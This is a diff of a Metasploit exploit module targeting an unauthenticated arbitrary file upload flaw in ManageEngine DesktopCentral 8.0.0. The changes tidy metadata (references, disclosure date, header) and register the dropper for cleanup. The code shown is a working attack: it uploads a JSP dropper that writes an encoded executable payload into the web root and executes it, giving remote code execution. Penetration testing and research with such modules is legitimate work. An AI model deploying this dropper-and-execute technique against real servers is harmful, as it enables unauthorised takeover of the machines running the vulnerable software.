Module cleaned for msftidy compliance.

modules/exploits/windows/http/desktopcentral_file_upload.rb

@@ -1,8 +1,6 @@
 ##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-#   http://metasploit.com/framework/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 
@@ -19,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
                 super(update_info(info,
                         'Name'           => 'DesktopCentral AgentLogUpload Arbitrary File Upload',
                         'Description'    => %q{
-					This module exploits an arbitrary file upload vulnerability in DesktopCentral 8.0.0 build 80286 or below..
+This module exploits an arbitrary file upload vulnerability in DesktopCentral 8.0.0 below build 80293.
 A malicious user can upload a JSP file into the web root without authentication, leading to arbitrary code execution.
                         },
                         'Author'         =>
@@ -27,12 +25,9 @@ class Metasploit3 < Msf::Exploit::Remote
                                         'Thomas Hibbert' # thomas.hibbert@security-assessment.com
                                 ],
                         'License'        => MSF_LICENSE,
-			'References'     =>
-				[
-				],
+                        'References'     => [ 'http://security-assessment.com/files/documents/advisory/Desktop%20Central%20Arbitrary%20File%20Upload.pdf'],
                         'Payload'            =>
                                 {
-					'BadChars' => "\x00",
                                 },
                         'Platform'       => 'win',
                         'Arch'               => ARCH_X86,
@@ -42,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
                                 ],
                         'DefaultTarget'  => 0,
-			'DisclosureDate' => 'some point....'))
+                        'DisclosureDate' => 'Nov 11 2013'))
 
                 register_options(
                         [
@@ -87,14 +82,12 @@ class Metasploit3 < Msf::Exploit::Remote
         exe = payload.encoded_exe
         exe_filename = rand_text_alpha_lower(8) + ".exe"
 
-        # The JSP dropper is needed because there isn't directory traversal, just
-        # arbitrary file upload to a web path where JSP code execution is allowed.
         dropper = jsp_drop_and_execute(exe, exe_filename)
         dropper_filename = rand_text_alpha_lower(8) + ".jsp"
-        print_status("#{dropper_filename}")
 
         if upload_file(dropper_filename, dropper)
           register_files_for_cleanup(exe_filename)
+          register_files_for_cleanup(dropper_filename)
           @dropper = dropper_filename
         else
           fail_with(Exploit::Failure::Unknown, "#{@peer} - JSP upload failed")
@@ -108,7 +101,6 @@ class Metasploit3 < Msf::Exploit::Remote
                          })
       end
 
-      # This should probably go in a mixin
       def jsp_drop_bin(bin_data, output_file)
         jspraw =  %Q|<%@ page import="java.io.*" %>\n|
           jspraw << %Q|<%\n|
@@ -144,9 +136,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
           jspraw
       end
-      
       def jsp_drop_and_execute(bin_data, output_file)
         jsp_drop_bin(bin_data, output_file) + jsp_execute_command(output_file)
       end
     end
-